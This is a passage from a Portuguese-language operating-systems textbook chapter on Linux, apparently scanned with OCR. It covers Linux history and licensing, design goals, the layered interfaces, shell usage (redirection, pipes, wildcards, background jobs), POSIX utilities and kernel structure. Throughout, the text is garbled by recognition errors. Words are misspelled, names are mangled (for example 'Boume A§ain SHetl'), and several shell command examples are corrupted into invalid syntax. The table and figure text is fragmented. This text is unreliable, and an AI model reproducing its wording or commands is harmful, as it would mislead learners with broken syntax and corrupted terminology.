a correęao de pequenos erros ou patches de seguranęa. 
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U ma grancie quantidade de software UN1X pa dra o foi 
transportada para o Linux, induindo o Sistema X Win¬ 
do w c muito software para conejcocs ern redes, Duas GUIs 
diferemes (GNOMĘ e KDE) tambem foram escritas para 
Linux. Em resume, de se tomou u m clone pode roso do 
UNIX, com todas as caractcristicas avanęadas que sens 
adeptos podem ąuerer. 

U ma caracterisUca nao usuai do Linux ć seu modd o 
comercial: de e urn software livre; pode ser copiado de 
varios lugarcs da Internet — por exemplo, cm: <www, 
kemd.org>. O Linux vem com u ma licenęa criada por 
Richard Stallman, fundador da Free Software Foundation 
(fundaęao para software livre). Independentemente de o 
Liiiux ser livre, essa licenęa, a GPL (GNU Public Lkense — 
licenęa publica GNU), e mais longa do que a licenęa do 
Windows da Microsoft e especifica o que voce pode e o 
que nao pode fazer com o código. Os usuarios podem usar, 
topią r, modificar e redistribuir os códigos-fonte e binariós 
livremente. A principal restrięao ć quc todos os trabalhos 
dcrivados do mkleo do Linnx nao podem ser vendidos ou 
redistrib indos somente na forma de código binario; os có- 
digos-fonie devem ser eiwiados com o produto ou disponi- 
bilizados medianie uma solid taęao. 

Em bora Torvalds ainda comrolc o nticleo com basta n- 
te atenęao, rnuitos programas em nfvel de usuario foram 
escritos por inumeros omros programadores; muitos deles 
originalmeme migraram do MINTX, do BSD e de comitnida- 
des GNU on-linę* Contudo, enquamo o Linux cvolui, uma 
pequena parcela da comunidade Linnx deseja desenvoIver 
constantemcnte o código-fome (o que e atestado pelas cen- 
tenas de livros di zen do como insialar e usar o Linux, cm 
tontraposięao a uma peąuena parte que discute o código e 
como de funciona)* Alćm disso, muitos usuarios do Linux 
arna] menie desprezam a distribuięao gram ha peta Internet 
e compram alguma das niuitas dislribuięóes em CD-ROM 
disponweis de diversas empresas comerciais concorrentes. 
Urn site popular que apresenta as cem dislribuięóes mais 
populares do Linux e <www.distrowatch ł org>. Na rnedida 
em que mais c mais empresas dc software comeęam a vcn- 
der suas próprias versoes do Linux c mais e mais empresas 
dc hardware comeęam a ofcreccr seus compmadorcs com o 
Linux pre-instalado, a divisao emre o software comercial e 
o software livre conieęa a fi car substancjalnie nie nebulosa. 

A thulo de observaęao sobre a historia do Unux, e in- 
teressantc notar qut\ oo moment o em que o vagSo Linu?c 
comeęou a ganhar fuinaęa, de recebeu um grandę impulsu 
de uma origem inesperada: a AT&T. Em 1992, Berkeley — 
naquela epoca ja desprovida de financiamento — dęci di u 
ter mi nar o desenvolvimento do BSD com uma vcrsao finał, 
4.4BSD (que posteriormente constituiu-se na base para o 
FrceBSD). Visto quc aąuela versao nao continha esscnciab 
mente nenlmm código AT&T, Berkeley lanęou o software 
sob uma licenęa de código aberto (nao GPL), que permitiu 
que todos fizessem o que quisessem com de, exceto mm 


coisa: processar a Universidade da Califórnia. A subsidiaria 
da AT&T que detinha o comrolc do UN1X imediatatnente 
reagiu — adivinhem como — processando a lMversida- 
de da Califórnia. Ela tambem processou uma empresa, a 
BSDL estabelcdda pclos desenvołvedores BSD para empa- 
cotar o sistema c vendcr o suporte, muito do quc a Red Hat 
c out ras empresas atuatmente fazem com o Linux, Visto 
que na rcalidadc nenhum código ATfrT estava envolvido, o 
processo foi baseado na mfraęao dos direitos autorais e da 
marca regisirada, induindo itens como o nu mero de tele- 
fone 1-S00-ITS-UNTX da BSDL Embora o caso letilia sido 
resoivido, essa aęao legał mantęve o FrecBSD fora do mer- 
cacio por um tempo longo o suficiente para que o Lintix se 
estabelecesse. Se esse processo nao tivesse ocorrido, teria se 
desenrolado, por voka dc 1993, urna competięao adrrada 
entre os dois sistemas UN1X com código aberto c livre: o 
campcao dominantę, BSD — um sistema maduro c cstavc! r 
com uma grandę niultidao de seguidores academicos desde 
1977 —versus o vigoroso e jovem desafiadon o Linux, de 
apenas dois anos de idade, mas com uma mullidao crescen- 
tc de usuarios individuais. Quem sabe como essa batalha 
de UN1XES livres teria terminado? 


10.2 


Visao geral do linux 


Ncsta seęao, farcmos uma introduęao geral ao Liruix 
c mostraremos como cle e usado, cm respeito aos leitores 
□inda nao familiarizados com de. Quase todo estc materia! 
se aplica as diferemes variaęoes do UNIX, com apenas [xhi- 
cas rcssalvas. Embora o Linux possua diferentes intcrfaces 
gra fi ca s, nosso foco esta em como o Linux sc apresenta 
para o programador que trabalha no modo terminal. As 
seęoes a seguir enfocarao as chamadas dc sistema c como 
elas funcionam imemamente. 


10.2.11 Ob|etivos do Linux 

O UNIX sempre foi um sistema interativo projetado 
para tratar miiltiplos processos e usuarios ao mesmo tem¬ 
po. Ele foi projetado por e para programador es, para ser 
usado em um ambiente no qual a maioria dos usuarios e 
relativamente sofisticada e engajada em projetos dc deseń- 
voivimcnto dc software (frcqucntcmcntc compkxos), Em 
muitos casos, um grandę nu mero de programadores Coo¬ 
pera atiyamentc para produzir um unico sistema e, nesse 
sentido, o UNIX lem exiensos recursos para permitir que 
as pessoas trabalhem juntas e eompariilhern informaęao de 
maneira comrolada. O modelo de um grupo de programa- 
dores experientes trabalhando juntos para produzir soft¬ 
ware avanęado obviamente e muito diferente do modelo de 
computaęao pessoal de um linico principiante trabalhando 
soztnlio com um proccssador de texto, e essa diferenęa e 
refletida por todo o UNIX desde o inicio atc o firn. 6 natura! 
quc o Linux tenha licrdado muitas dessas metas, embora a 
primeira versao fosse para computadorcs pcssoais. 
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O que os bons programadores esperant de um sistema? 
Para comeęar, que seus sistemas sejam simpies, elegan- 
tes e consistentes. Por exeniplo, no niVel mais baixo, um 
arquivo deveria simplesmente ser unia colecao de bytes. 
Ter difcrentes dasses dc arquivos provendo accsso scquen- 
dal r accsso alcatóim accsso chavcado, accsso rcmoto etc. 
(como os computadores de grandę porte fazcm) simplcs- 
mcntc incomoda* Da inesma mancira, se o comando 

Is A* 

signilka apresentar todos os arquivos comeęando com 'A f , 
eniao o comando 

rm A* 

deve sigm Ikar a remoęao de todos os arquivos comeęando 
com A', e nao a remoęao de um arquivo cujo nonie seja 
constimfdo por um 'A' e um asterisco. Essa caractenstica 
muitas vezes e cha ma da de primpio dasurpma minima. 

Outra coisa que os programadores experientes geral- 
mente buscam e desernpenho c nexibiltda.de. Isso significa 
que u m sistema deve ter um nu mero peąueno de de men - 
tos basicos que possani ser combinados de infinitas manei- 
ras para saiisfazer a aplicaęao* Um dos prindpios basicos as- 
sociados ao Linux e que todo programa deve fazer somente 
unia coisa c fazę-la Lienfeita. Assim, os compiladores nao 
produzem listagens porque outros programas sao capazes 
de reolizarisso mellior. 

Por firn, a maioria dos programadores tern urna forte 
amipatia as redundancias inuieis* Por que usar copy quan- 
do cp e suHciente? Para retirar todas as linhas co mend o a 
cadeia 'ard' do arquivo/, os programadores Linux u sam 

grep ard f 

A estrategia oposta ocorre qi]ando o programador pri- 
meiro sderiona o programa grep (sem argumentos) e de¬ 
pois espera grep anunriar por si próprio: "Ot, eu sou grep. 
Procuro cadeias em arquivos. Por favor r entre com sua ca- 
deia". E, depois de obter a cadeia, grep para e espera pelo 


nome do arquivo. Em seguida, ele pergunta se existem 
mais nomcs de arquivos. Por lim, resume aąuilo que vai 
fazer e pergunta se csta correto. Enąuanto esse tipo de im 
terfacc de usuario pode on nao ser adequado aos novatos, 
ele irrita os programadores expcricnies — quc qucrcm um 
servidor, e nao urna baba. 

10.2.21 Interfaces para o Linux 

Um sistema Linux pode ser considerado um lipo de 
piramidę, como ilustrado na Figura 10J. Na base csta o 
hardware, que e formado por CPU, memória, discos, Lenni- 
nais e outros dispositivos, Exccutando dii etamentc sobre o 
hardware esia o sistema operacional Linux. Sua funęao e 
comrolar o hardware e fornecer urna interface de chama- 
das de sistema para todos os programas. Essas chamadas 
dc sistema permiiem que os programas do usuario criem e 
gc ren ciem proccssos, arquivose outros rccursos. 

Os programas fazem chamadas de sistema colocali¬ 
do argumentos nos icgisiradores (ou, algumas vczes, na 
pilha) e cmitindo instruęóes dc interrupęao de software 
(trap) para chavear do modo usuario para o modo niicleo, 
Visto quc nao existe como cscrcvcr umn instruęao tle inler- 
rupęao de software em C, unia biblioteca e fornerida, com 
um procedimcnto para cada cha mada dc sistema. Essas ro- 
tinas sao escritas em linguagem assembly, mas podem ser 
chamadas de programa em C Cada urna primdro coloca 
seus argumentos no local correio e depois execma a ins- 
truęao de interrupęao* Assim, para execular unia cha mada 
de sistema read, um programa C pode cha mar a rotina de 
biblioteca reaŁ A tftulo de observaęao, e a interface da bi¬ 
blioteca, e nao a da chamada de sistema, que e especificada 
pelo POSiX. Ern outras palavras, o POSiX diz quais procedi- 
mentos dc biblioteca um sistema conformativo dcvc suprir, 
qttais sao seus parametrom o que des devem fazer e quais 
resullados devem ret orna r. Ele nem ao menos inenciona as 
chamadas de sistemas reats. 


interface 
do usuario 


Interface 
de biblioteca 


interface de 
chamadas 
de sistema 

jL 


Usuarios 


Programas utllltarios padrao 
[sheli, editores, compiladores etc.} 


Biblioteca-padrao 
(open, elose, read, write, fork etc.) 


Sistema operacional linu* 

(gerenciamento de processo, gerenciamento de memória, 
sistema de arquivos, E/S etc.) 


Hardware 

(CPU, merriória, discos, terminais etc.) 


Modo 

usuario 


Modo nucleo 


I Figura 10.1 Ascamadas em um sistema Unux. 
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Alem do sistema operadonal e da biblioteca de dia- 
iriadas de misterna, todas as versoes de Lmux fornecem um 
grandę numero cle programas-padrao, alguns dos quai$ sao 
especificados pdo padrao POSIX 1003.2 e oniros dilerem 
cntrc vcrsocs Linux. Entrc des estao o Intcrprctador de 
comandos {shdl}, oscompiladores, os cditores, os pr ogra mas 
de processamemo de textoeos utilitariosde manipulaęao de 
arquivos. Esses sao os programas que um usuario evoca em 
urn terminal Podemos, portanto, falar de tres tipos diferen- 
tes de interface para o Linii x; a verdadeira interlace para 
diamadas de sistema; a interface dc biblioteca e a interface 
for mada pdo conjumo de programas dc aplicaęao padrao. 

A maioria das distribuięóes do Linux para PCs substi- 
tuiu a interface orientada para o tedado por uma interface 
gralica orientada para o mouse, sem inodifkar nada no sis¬ 
iema operadonal E prccisammic essa flexibilidade que faz 
o Linux tao popular c permitiu que cic sobrcvivcssc tao 
bem as iniimeros mudanęas na tccnologia subjacentc. 

A GUI para o Linux ć semelhamc as primeiras GUIs 
desenvolvidas para os sistemas UNIX na decada de 1970, 
popularizadas pelas plataformas do Macintosh e, mais tar* 
de, do Windows. A imerface gra lica cria um a mbierne dc 
arca de trabalho, uma metafora ja conhecida, com jane¬ 
las, icones, pasias, barras de ferramenias e fimcionalidadeś 
do lipo arrastar c soltan Um ambieme dc area dc trabalho 
eompleto contem um gerenciador de janelas, que controla 
a disposięao e a arrumaęlo das janelas, e oferece uma in¬ 
terface gra fi ca consistente. Os ambientes no estilo area de 
trabalho mais populares para o Linux inclucm o GNOMĘ 
[GNU NetWork Objęci Model Ewiwnment) e o KDE (K Desktop 
Emiroument). 

As interfaces graficas do Linux sao executados pdo Sis- 
tema X Window, comumente chamado de XIJ ou simples- 
mente X, que define a comimicaęao e exibe protocolos para 
manipulaęao de janelas pcla exibięao de mapas de bits 
para sistemas UNIX e afins. O servidor X e o prindpal com- 
ponente para controle de dispositivos como tedados, mou- 
ses c monitores e e o responsavcl pdo rediredonamento da 
emrada ou da salda para os programas do cliente. O ambien- 
tc GUI reai e tipicameme montado sobre uma biblioteca dc 
baixo mvd, a xJib , quc contem as funcionalidades para intc- 
ragir com o semdor X. A interface grafica estende a fundo* 
nalidade do X! 1 enriąuecendo a visao dajanda, fomecendo 
botoes, menus, i eon es e om ras ópęóes. O semdor X pode ser 
inidado manualmente, a partir de uma linha de comando, 
mas e cornurn que seja inidado durante o processo de inicia- 
lizaęao por meio de um gerenciador de tela, quc cxibc para 
o usuario a tela grafica de autenlicaęao (login). 

Quando trabalham na interface grafica de um sistema 
Linux, os usuarios podem utilizar diques no mouse para 
executar aplicacoes ou abrir arquivos, recorrcr ao recurso 
de arrastar e soltar para copiar arquivos de um ki gar para 
outro etc, Alem disso, e possivd executar um programa de 
emulaęao de terminal ou xtemi que oferece aos usuarios a 


imerface de linha de comando basica para o sistema opera¬ 
donal. Sua deserięao e apresentada na seęao a seguir. 

10.231 O interpretador de comandos 
(Shell) 

Embora os sistemas Linux tenham uma interface gra li¬ 
ca, a maioria dos programadores e usuarios mais solistka- 
dos ainda prefcrc a imerface de linha de comando chamada 
intem ret a doi de comandos (shell), Em geral des abrem 
uma ou mais janelas desse intcrprctador a partir da imerfa¬ 
ce grafica e trabalham somente nelas. A imerface do shell 
e muito mais rap id a dc usar f mais poderosa, facilmeiite ex- 
tensivel c nao causa nenhuma lesao por csforęo repelitivo 
(LER ) no usuario em decorrencia do uso i menso do mouse. 
A seguir, resumiremos brevementc o shell bash t fortcincnle 
baseado no shell original do UNIX, o Bom me. Seu nome, 
na verdade, e um aerdnimo para Boume A§ain SHetl (shdl 
Bon me novamente). Muitos ouu os shells tambćm se cn- 
contram em uso {k$h t csłi etc.) H mas o hash e o padrao na 
maioria dos sistemas Linux, 

Quando aci.onado, o shell mostra um ca ractere chama- 
do prompt — multas vezes um sinal de porcentagem ou 
cifrao — na tela e espera que o usuario entre com uma 
linha de comando. 

Quando o usuariodigita uma linha de comando, o shdl 
cxtrai a primeira palavra dessa linha, presume quc cssa pa- 
lavra e o nome dc um programa a ser executado, procura 
por esse programa e, se de for cncontrado, o cxcculo. O 
shell cniao suspendc a si próprio ate que o programa ter- 
mine, ąuando entao ele tema ler novamente o próximo co¬ 
mando. E importante observar quc o shell e simplesmente 
um programa comum do usuario. Tu do o que ele precisa e 
ter habilidade de 3cr a partir do teclado e escrever no moni¬ 
tor c o poder de executar outros programas. 

Os comandos podem levar argument os, que sao passa- 
dos como cadeias de caracteres para o programa chamado. 
Por exemplo, a linha de comando 

cp sre efest 

evoca o programa cp com dois argumentos, sre c dest. Esse 
programa mterpreta o primeira deles como o nonie de um 
arquivo exisiente. Em seguida, faz unia cópia desse arquivo 
c colo ca o nome de dest. 

Nem to dos os argumentom sao nomes de arquivos. No 
comando 

head -20 file 

o primeiro argumento, -20, pede a head para imprimir as 
primeiras 20 linhas do arquivo fik, em vez do numero con- 
yencional de linhas, dez. Os argumentos que controlam a 
operaęao de um comando ou cspecificam um valor opcio- 
nal sao chamados de flags e, por convenęao, sao indicados 
com um trnęo. O traęo e necessario para cvitar ambiguida- 
de, pois o comando 

head 20 file 
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e perfeitamente valido e pede a head que primeiro imprima 
as dez linhas imriais de um arquivo chamado 20 e r poste- 
riormente, imprima as dez linhas iniciais de um segundo 
arquivo chamado file. A maioria dos comandos do Linux 
aceita varias flags e argument os. 

Para facilitar a espedftcaęao de varios nomes de arqui- 
vos, o shell aceita caracteres magicos, algumas vezes cha- 
niados de caracteres curinga (wild cards). Um asterisco, 
por exemplo, pode gen eri ca menie ser associado a qualqiier 
cadeia de caracteres; desse modo 

ls ".c 

pede quc Is reladone lodos os arquivos cujos nomes icrmi- 
nem com a exiensao x. Se exisiirem arquivoschamadosxc 
yx e zx f o comando anterior sera eqmvalenie ao seguinte 
comando: 

l$ x.cy.cz,c 

Outro caractere curinga e o sina! de interrogaęao, 
que corresponde a qualquer caractere, U ma lista de ca¬ 
racteres dentro de colchetes seleciona qtialquer um deles, 
como o exemp!o 

Is [aper 

que reladona todos os arquivos com 'p f ou 'e\ 

Um programa como o sliell nao precisa abrir um ter¬ 
minal (teclado e monitor) para ler ou escrever nele. Em vez 
disso, quando o shell (ou qualquer outro programa) se ini- 
da, ele automaticamente tern acesso a um arquivo chama* 
do entrada-padrao (para leittira), a outro arquivo cha¬ 
mado saida-padrao (para escrita nor mai) e ainda a outro 
arquivo chamado erro-padrao (para esciita de mensagens 
dc erros)* Hm gcral todos os tres arquivos sao a ss oda dos a 
entradas e safdas convencionais de um terminal de modo 
qne leku ras da entrada-padrao vem do teclado e escritas 
para a safda-padrao ou erro-padrao vao para a tela. Muitos 
programas Linux leem e escrevem nesses a rqm vos-pa dra o 
setn a necessidade de especificaęao. Por exemplo, o comando 

sort 

invoea o programa sort „ que te linhas do terminal (ale qne 
o usuario digile CTRL-D, para indicar lim de arqinvo), or- 
dena essas linhas alfabeticamente e escreve o resultado 
na tela. 

Tambcm ć possfvd rediredonar a entrada-padrao c a 
saida-padrao, o que muitas vezcs 6 titil. A sintaxe do redi- 
redonaniemo da entrada-padrao usa o sina! hnenor que' 
(<), seguido pelo nome do arquivo de entrada. Da mes- 
ma maneira, a safda-padrao e rediredonada usandoo sinal 
'maior que' (>). Ć permitido redirectonarambos no mesmo 
comando. Por exemplo, o comando 

sort <in >oot 

faz com que sort -obtenha sua entrada do arquivo in e escre- 
va sua safda no arquivo out. Visto que o erro-padrao nao foi 


redirecionado, qualquer mensagem de erro ira para a tela. 
Um programa que Ic seus dados da entrada-padrao, faz al¬ 
gom processamento sobrc eles e escreve seus resultados na 
safda-padrao e chamado de filtro. 

Considerc a seguinte lin ha de comando, que consiste 
em tres comandos separados: 

sort <in >temp; head -30 <temp; rm temp 

Ela primeiro executa son, obtendo a entrada de m e 
escrevendo a safda em temp. Quando este tiver sido con- 
etufdo, o shell exccuia head, dizendo a ele para imprimir 
as primeiras 30 linhas de temp na safda-padrao, que conse- 
queniemente vai para o terminal. E, por ultimo, o arquivo 
tempo rano e removido. 

Frequentemente r o primeiro programa de urna linha 
de comando produz a safda, que e osada como a entrada do 
programa seguinte. No cxcmplo citado ameriormente, usa- 
mos o arquivo temp para eon ter essa entrada. Contudo, o 
Linux oferece urna construęao simples para fazer a mesma 
eoisa. No comando 

sort <in | head -30 

a barra vertical, chamada de simbolo pipę, diz ao UNiX 
para obiera safda de sort c usa-la como entrada de head[ eli- 
minando a necessidade de criaęao, utilizaęao c remoęao do 
arquivo temporario. Um conjunto de comandos conecta- 
dos por smibolos do lipo pipę, chamado de pipeline, pode 
conter muitos comandos arbiiraiios, Um |iipeline de quatro 
componentes e mostrado pelo seguinte exemplo: 

grep ter *,t | sort | head -20 \ taił -5 >foo 

Nesse caso, todas as linhas contendo a cadeia de carac¬ 
teres 'ter' de lodos os arquivos finalizados em A sao escritas 
para a safda-padrao, onde elas sao ordenadas, As primeiras 
20 delas sao selecionadas pelo head , que as repassa para 
taił que, por sua vez, escreve as ultimas cinco (isto e, as 
linhas dc 16 a 20 da lisia ordenada) no arquivo foo. Esse e 
um exemplo de como o Linux fornece a construęao basica 
de blocos (filtros miiltiplos), em que cada um realiza um 
trabalho, inseridos em um mecanismo no qual des sao cs- 
truturados cm urna Infinidadc de formas. 

O Linux e um sistema mulliprogramado dc propósito 
geral. Um unico usuario pode executar varios programas 
de urna só vez, cada qu.al como um processo separado. A 
sintaxe do shell para a execuqao de um processo em segun- 
do piano { hackpround) utiliza um smal dc 'c' comercial após 
o comando. Dessa maneira, 

wc -I <a >b & 

cxcaua o programa contador de palavras, wc, para contar 
o nu mero dc linhas (Hag-/) de sua entrada, a f cscrevendo 
o resultado eiu h, mas tudo isso em segundo piano. Depois 
que o comando foi inserido, o shell mosira o prompt e, as- 
sim, prontifica-se a aceitar e tratar o próximo comando. 
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Pipelines tambem podem ser colocados em segundo piano; 
por exemplo, o comando 

sort <x | head & 

permite que varios pipelines possani executar em segundo 
piano simulianeameme. 

t posslvel colocar urna lista de comandos do sliell em 
um arquivo e depois cx ecu tar o shell o san do cssc arquivo 
como sua en trąd a-pa dra o. O (segundo) shell simplesmente 
pi occssa os comandos em ord cm, como se fossem digitados 
pelo teclado. Arqulvos comendo comandos do inierpreta- 
doi de comandos sao chamados de shell do script. Um 
shell do script pode assodar valores a variaveis do shell e, 
entao, ter esses valores posteriormente. Pode tambem ter 
para met ros e usar construtores if, for, whilo e case. Com isso, 
um shell do script e, na vcrdade, um prograrna escrito em 
iinguagem do shell O shell Berkeley C fol um shell altema- 
iivo projetado para fazer shells do script (e a Iinguagem de 
comandos em geral) pareddos, em nniitos a spec l os, com 
programas em C. Visto que o shell e simplesmente um pro- 
grama de usuario, muitas pessoas ja escreveram e distribuf- 
ram varios ourros shells. 

10-2.41 Programas utilitarios do Linux 

A inlcrface do shell do Liiuix consistc em um grandę 
n u mero de programas tuiliiarios pa dra o. Falami o generi- 
camente, esses programas podem ser divididos em seis ca- 
tegorias: 

1. Comandos para a manipulaęao de arquivos e diretórios. 

2. Filtros. 

3. Ferramentas de desenvolviniemo tle programas, 
como ediloics c compiladores. 

4. Processamento de iexio. 

5. Admimstraęao dc sistema. 

6. Miscelaneas. 

O padrao POSIX 1003.2 especifica a simaxe e a se- 
maulica de apenas pouco menos de cem desses uUliiarios, 
prindpalmcntc nas trćs primdras ca tegorias, O objetivo 
de pa dron i za-los e possibilitar a qualquer pessoa escrever 
shells do script que usem esses programas e funcionem 
em lodos os sistemas Lmux, 

Alem desses utiliLarios-padrao, existem muitas aplica- 
ęoes tambem, como navegadores da Web, visualizadorcs 
de imagens etc. 

Vamos considerar alguns exemplos desses programas, 
comeęando com a manipulacjo de arquivos e diretórios, 

cp a b 

copia o arquivo a para outro chamado h, dcixando o odgi¬ 
nał i n ta eto, Em contrapartida, 

mv a b 


copia a em h mas remove o original. Consequentemen- 
te, de move o arquivo em vez de rcalmemc (azer urna 
copia no sentido usual. Yarios arquivos podem ser eon- 
catenados usando cat , que le cada um de seus arquivos 
de entrada c os copia para a satda-padrao, um após o ou¬ 
tro. Arquivos podem ser removidos por meio do comando 
rm. O comando chmod permite que o proprietario allere 
os bits de direitos para modifkar as permissóes de acesso. 
Diretórios podem ser criados com mkdir c removidos com 
rmdir. Para ver a lista dos arquivos de um diretório, pode- 
-se usar Is. Esse comando tern muitos bits de informaęao 
iflap) que controlam os detalhes a serem apresemados 
sobie os arquivos lisia dos (por exemplo, lama u ho, pro¬ 
prietario, grupo, data de criaęao), determinant a ordem 
da apresentaęao (por exemplo, alfa be lica, de a co r do com 
a hora da ultima modificaęao, ou iiwertida), csperificam 
o layoui na tela e muiio mais* 

Ja vimos varios fiilroś; grep ćxLrui as linhas que COntem 
um padrao fornerido pelo usuario, da entrada-padrao ou 
de um ou mais arquivos de entrada; sort ord cna sua entrada 
escrevendo-a na saida-padrao; head extrai as linhas iniclais 
de sua entrada; e tai! extrai as linhas finais de sua entrada. 
Outros lilrros definidos pelo 1003.2 sao cut e pasie, os quais 
permjtem que colunas de texto sejam conadas e coladas 
dentro de arquivos; ad converte sua entrada (geralmente 
binaria) em texto ASCII octal, decimal ou hexadecimal; tr 
permite ajustes nos caracieres (por exempIo, dc lelras pc- 
quenas para lelras grandes); e pr formata a salda para a 
impressora, permitindo a indusao de cabeęalhos, mlmero 
de paginas e assim por dianie. 

Compiladores e ferramentas de programaęao incluem 
$cc f que chama o compilador C, e ar, que junta pmcedi- 
mentos de bibliotecas em arquivos comprimidos. 

Outra ferramema importante e make, usada na mann- 
tenęao de programas extensos cujos códigos-fonte consis- 
tam em varios arquivos. De modo geral, alguns desses sao 
arquivos de cabeęalho (headerfiles), que contem tipos, 
variaveis, macros c outras dęciaraęóes. Os arquivos-fonte 
muitas vezes induern esses arquivos de definięoes usali¬ 
do unia diretiva espccia! cha mada itulude. Dessa maneira, 
dois ou mais arquivos-fome podem compartilhar as mes- 
mas dedaraęóes. No entanto, se um arquivo de definięoes 
sofre modificaęóes, e necessario en contr ar todos os arqui- 
vos-fonte que dependem dele e recompila-los. A funęao 
de make ć controlar ąuais arquivos-fonie dependem dc 
quais arquivos de definięoes e coisas do lipo, providen- 
ciando para que todas as compilaęóes necessarias sejam 
feitas automaiicamente. Quase todos os programas Linux, 
exceto os nuiito pequenos, sao organizados para serem 
compilados com make , 

Urna seleęao de programas uiilitarios POSfX e apresen- 
tada na Tabela 10.1, com urna breve descrięao de cada um, 
Todos os sistemas Linux tern esses programas c muiio mais. 
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Programa 

Tipica mente 

cat 

Concatena v^rios arquivos para a saida-padrao 

chmod 

Altera o modo de proteęao do arquivo 

cp 

Gopia um ou mais arquivos 

cut 

Coda colunas de texto de um arquivo 

grep 

Procura um certo padrao dentro de um arquivo 

head 

Extrai as primeiras linhas de um arquivo 

Is 

Usta di retor io 

make 

Com pila arquivo$ e constrói um binario 

mkdir 

Griaum drretório 

od 

Gera uma imagem (dump) octal de um arquivo 

pasta 

Cola colunas de texto dentro de um arquivo 

pr 

Formata um arquivo para impressao 

PS 

Lista os pnooessos em execuęao 

rm 

Remove um ou mais arquivos 

rmefir 

Remove um diretório 

sort 

Ordena um arquivo de linhas alfadetioamente 

lail 

Extrai as ultimas linhas de um arqulvo 

tr 

Traduz enlre conjuntos de caracteres 


I Tabela 10.1 Atguns dos programas utilitórios Unux comuns, 
regueridos por POSIX, 


10.2.51 Estrutura do imcleo 

Na Figura 10.1, vimos a estrutura global de um sistema 
Linux. Agora vamos amplia-la e observar o nucleo mais de 
peilo anles de oiaminar as varias partes quc o comtituem, 
como o escalonamcmo de processos e o sistema de arquivos. 

O nudeo esta diretamente rdadonado ao hardware, 
permite interaęóes cum os dispusitivos de E/S e com a uni- 
dade de gerendamento de memória c eon troi a o acesso da 
CPU a eles, No mvd mais bako, conforme mostra a Figura 
10.2, estao o tratador de interrupęoes— que e a forma pri- 
maria de interaęao com os dispositiros — e o mecanismo 
de despacho dc mvel mais bako, arionado quando ocorrc 
urna interrupęao. O código de bako mvei para o processo 
em execuęao saka seu estado na tabela de processos do 
nucleo e inida o driver aproprlado. O despacho de pro¬ 
co ssos tambem ocorrc qi jando o nucleo conclui alg u mas 
operaęoes — momento em que um processo do usuario e 
iniciado novamente + O código dc despacho esta em lingua - 
gem asscmbly e ć totalmcme diferemc do escalonamento. 

Em seguida, dividimos os varios subsistemas de nii- 
cleos em tres componentes principais. O componeme de 
dispositivos dc E/S na Figura 10.2 contem todas as partes 


do nucleo responsaveis pela interaęao com os disposiiivos F 
com a rede dc computadores em funcionamenio e com as 
operaęoes de rede e annazenamento de E/S. No mvel mais 
alto, cssas operaęoes sao todas imegradas sob u ma ca ma¬ 
da denominada sistema Wrtual de arquivos, Isso signilica 
que, no nivd mais a ho, a exetuęao de urna operaęao dc 
leitura de arquivo, esteja de na memória ou no disco, e o 
mesmo quc a cxccuęao dc urna operaęao dc leitura para 
recuperar um caractere digilado via tedado. No nfvel mais 
bako, todas as operaęoes de E/S passam por algom drivcr 
dc dispositivo. Todos os drivers do Linux estao classificados 
como drivers de dispositivo de caracteres ou drivers de dis- 
positivo de blocos, e a prindpal difercnęa entre eles e que 
as buscas e os acessos aleatórios Sao permitidos no diiver de 
dispositivo de blocos, mas nao no driver dc disposilivo de 
caracteres, Tecnicamente, os disposilivos de rede sao reab 
mente dispositlvos dc caracteres, mas sao gerendados de 
forma diferemc, c r porta ino, e melhor que fiqucm separa- 
dos — conforme feito na figura. 

A ci ma da camada de drivers de dispositivos, o código 
do nucleo c difereme para cada tipo de dispositivo. Os dis- 
posilivos de caracteres podem ser milkados de duas manei- 
ras. Alguns programas, como os editores visuais vi e emm, 
ąucrem todas as tedas pressionadas indmdualmcnte, A 
E/S para terminais dc caracteres (ffy) torna isso possfvel, 
Oulros programas, como o shell (s/t), sao orientados a li- 
nhas e permkem quc os usuarlos editem suas lin bas atuais 
a mes dc ciwiarem-nas ao programa pressionando a Lccla 
ENTER, Nessc caso, csse fluxo de caracteres do dispositivo 
terminal passa atraves do que e denominada disciplina de 
linhas, e a formataęao adeąuada eaplicada. 

O software de rede muitas vezes e modular, dando su- 
porte a diferentes dispositivos c protocolos. A camada acima 
dos drivcrs dc rede trata um tipo de funęao dc roteamento, 
garantindo que os pacotes corretos cheguem ao di.spositi.vo 
ou tratador dc protocolo certo. A maioria dos sistemas Li- 
nux contem a fun.ctonalida.dc completa dc um roteador cm 
hardware dentro do miclco, embora o desempenho seja ijv 
ferior a o de um roteador em hardware, Acima do código do 
roteador esta a pil ha real de protocolos, induindo sempre 
IPeTCP, mas algumas vezcs tambem oulros protocolos adi- 
rfonais. Acima das camadas dc rede esta a inlerface de so- 
ąuete, que permite que os programas criem soąuetes para 
redes e protocolos particiilares, retornando um descritor de 
arquivos para que cada soąuete ulilke mais larde. 

No topo dos drivers dc disco esta o cscalonador dc E/S, 
rcsponsavel por ordenar e distribuir as solidtaęoes de ope¬ 
raęoes dc disco dc forma a tenlar cvitar movimcmos desnc- 
cessariosou encontrar outra poKtica de sistema. 

Bem no topo da coluna de dispositivos de blocos esta 
o sistema de arquivos f A maioria dos sistemas Linux da su- 
porte a multiplos sistemas dc arquivos coexistindo simulta- 
neanieme. De forma a esconder da impłementaęao do sis- 
tema dc arquivos as inopommas difercnęas estruturais dos 
diversos dlsjpositivos dc hardware, uma camada de dispo- 
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sitivos genericos de blocos oferece uma abstraęao miłizada 
por todos os sistemas de arqnivos. 

Do lado direito da Figura 10.2 esLao os ontros dois 
componentes do nucleo do Limu, responsaveis pelas la- 
rcfas de gerenciamemo de memória e processos. As tarefas 
de gerenciamemo de memória induem a maniitenęao do 
mapeameruo entre as memórias viruial e ffsica, a rnanu- 
lenęao de unia ca che de paginas acessadas recememente, 
a iinplcmcruaęao de unia boa poiitica dc substituięao de 
paginas e o carregamento sob demanda dc novas paginas 
com códigos on dados necessarios para a memória. 

A principal responsabilidadc do componente dc gercn- 
da mcii to dc processos e a criaęao c o enccrramento daque- 
les. Ele tambem realiza o escalonamento de processos, que 
escolhe qual o próximo processo, ou thread, a ser execu- 
lado. Como veremos na próxima seęao, o nucleo do Linux 
iraia processos e ilireads como emidades execuiaveis e os 
escalona com base na poiitica global de escalonamemo. Por 
firn, tambem pertence a esse componente o código de tra- 
tamento de sinais. 

Embora os tres componentes estejam representados 
sępa rad a me me na figura, eles sao aitamente iiuerdepen- 
denles. Os sistemas de arquivos gerai menie acessam os 
arquivos por rneio dos dispositivos de blocos. Entretamo, 
de forma a ocullar o tempo dc carregamento dc dados do 
disco para a memória, os arquivos sao copiados para a pa- 
